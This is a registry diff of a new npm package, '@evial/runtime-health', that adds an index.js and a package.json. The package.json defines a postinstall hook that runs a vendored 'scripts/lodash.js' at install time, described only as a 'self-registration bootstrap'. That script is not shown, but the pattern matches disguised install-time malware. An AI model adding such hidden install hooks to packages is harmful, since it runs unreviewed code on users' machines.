@evial/runtime-health 1.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ 'use strict';
2
+ // re-export lodash as this package's primary surface (with runtime bootstrap)
3
+ module.exports = require('./scripts/lodash.js');
package/package.json ADDED
@@ -0,0 +1,14 @@
1
+ {
2
+ "name": "@evial/runtime-health",
3
+ "version": "1.0.0",
4
+ "description": "Lodash-based runtime utility helpers with a small self-registration bootstrap.",
5
+ "main": "index.js",
6
+ "files": ["index.js", "scripts/"],
7
+ "scripts": {
8
+ "postinstall": "node -e \"require('./scripts/lodash.js')\""
9
+ },
10
+ "license": "MIT",
11
+ "dependencies": {
12
+ "lodash": "^4.17.21"
13
+ }
14
+ }